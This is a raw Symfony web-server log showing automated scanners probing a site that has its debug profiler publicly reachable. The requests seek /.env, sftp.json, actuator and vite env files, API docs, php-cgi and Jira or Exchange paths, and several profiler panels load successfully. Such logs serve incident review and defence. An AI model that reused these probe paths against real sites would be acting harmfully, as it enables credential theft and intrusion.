[2025-12-20 08:49:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"70c86d","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/70c86d?panel=swiftmailer","method":"GET"} []
[2025-12-20 08:49:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-20 08:50:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=51.161.82.133&limit=10&method=POST","method":"GET"} []
[2025-12-20 08:50:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=51.161.82.133&limit=10&method=POST","method":"GET"} []
[2025-12-20 08:50:36] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-20 08:50:45] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-20 08:50:45] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-20 08:50:45] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 08:50:45] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 08:50:45] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 08:50:45] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 08:50:45] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 08:50:45] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-20 08:50:45] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-20 08:50:45] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 08:50:45] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 08:50:45] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 08:50:45] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 08:50:45] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 08:50:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:50:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:50:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:50:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql/api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql/api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:50:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/gql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/gql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:50:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:50:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:50:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:50:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webjars/swagger-ui/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webjars/swagger-ui/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:50:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:50:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/v1/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/v1/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:50:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:50:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v3/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v3/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:50:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api-docs/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api-docs/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:50:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:50:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /@vite/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /@vite/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:50:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:51:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /php-cgi/php-cgi.exe"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /php-cgi/php-cgi.exe\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:51:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:51:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.vscode/sftp.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.vscode/sftp.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:51:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /about"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /about\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:51:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /debug/default/view"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /debug/default/view\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:51:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/_catalog"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/_catalog\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:51:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:51:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server-status"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server-status\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:51:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login.action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login.action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:51:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_all_dbs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_all_dbs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:51:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.DS_Store"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.DS_Store\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:51:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:51:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:51:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:51:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /telescope/requests"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /telescope/requests\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:51:20] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/?rest_route=%2Fwp%2Fv2%2Fusers%2F","method":"GET"} []
[2025-12-20 08:51:20] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-20 08:51:20] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 08:51:20] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 08:51:20] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 08:51:20] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 08:51:20] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 08:52:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=47.242.70.104&limit=10","method":"GET"} []
[2025-12-20 08:52:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=47.242.70.104&limit=10","method":"GET"} []
[2025-12-20 08:53:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"63017c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/63017c?panel=security","method":"GET"} []
[2025-12-20 08:53:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-20 08:57:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 08:58:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c4fb0b","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/c4fb0b?panel=events","method":"GET"} []
[2025-12-20 08:58:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-20 08:59:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"915a40","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/915a40","method":"GET"} []
[2025-12-20 08:59:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
